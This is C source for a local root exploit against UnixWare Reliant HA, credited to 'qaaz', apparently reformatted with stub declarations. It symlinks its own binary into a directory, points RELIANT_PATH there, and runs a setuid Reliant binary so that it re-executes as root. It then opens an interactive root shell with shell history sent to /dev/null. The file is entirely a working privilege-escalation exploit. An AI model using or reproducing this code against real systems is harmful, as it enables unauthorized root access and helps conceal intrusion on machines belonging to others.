
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int pid_t ;
typedef int path ;


 char* BIN ;
 char* DIR ;
 scalar_t__ EEXIST ;
 int EX_OK ;
 char* TGT1 ;
 char* TGT2 ;
 scalar_t__ access (char*,int ) ;
 int dup2 (int,int) ;
 scalar_t__ errno ;
 int execl (char*,char*,char*,...) ;
 int fork () ;
 int getcwd (int *,int) ;
 scalar_t__ geteuid () ;
 int getpid () ;
 int getppid () ;
 int kill (int ,int) ;
 scalar_t__ mkdir (char*,int) ;
 int printf (char*,...) ;
 int putenv (char*) ;
 int rmdir (char*) ;
 int setuid (scalar_t__) ;
 int sprintf (char*,char*,int) ;
 char* strcat (char*,int ) ;
 char* strerror (scalar_t__) ;
 scalar_t__ symlink (char*,char*) ;
 int unlink (char*) ;
 int waitpid (int,int *,int ) ;

int main(int argc, char *argv[])
{
 char self[4096], *target;
 pid_t child;

 if (geteuid() == 0) {
  setuid(geteuid());
  dup2(3, 0);
  dup2(4, 1);
  dup2(5, 2);
  if ((child = fork()) == 0) {
   putenv("HISTFILE=/dev/null");
   execl("/bin/sh", "sh", "-i", ((void*)0));
   printf("[-] sh: %s\n", strerror(errno));
  } else if (child != -1)
   waitpid(child, ((void*)0), 0);
  kill(getppid(), 15);
  return 1;
 }

 printf("----------------------------------------\n");
 printf(" UnixWare Reliant HA Local Root Exploit\n");
 printf(" By qaaz\n");
 printf("----------------------------------------\n");

 if (access(TGT1, EX_OK) == 0)
  target = TGT1;
 else if (access(TGT2, EX_OK) == 0)
  target = TGT2;
 else {
  printf("[-] No targets found\n");
  return 1;
 }

 sprintf(self, "/proc/%d/object/a.out", getpid());

 if (mkdir(DIR, 0777) < 0 && errno != EEXIST) {
  printf("[-] %s: %s\n", DIR, strerror(errno));
  return 1;
 }

 if (symlink(self, BIN) < 0) {
  printf("[-] %s: %s\n", BIN, strerror(errno));
  rmdir(DIR);
  return 1;
 }

 if ((child = fork()) == 0) {
  char path[4096] = "RELIANT_PATH=";

  dup2(0, 3);
  dup2(1, 4);
  dup2(2, 5);
  putenv(strcat(path, getcwd(((void*)0), sizeof(path)-14)));
  execl(target, target, ((void*)0));
  printf("[-] %s: %s\n", target, strerror(errno));
  return 1;
 } else if (child != -1)
  waitpid(child, ((void*)0), 0);

 unlink(BIN);
 rmdir(DIR);
 return 0;
}
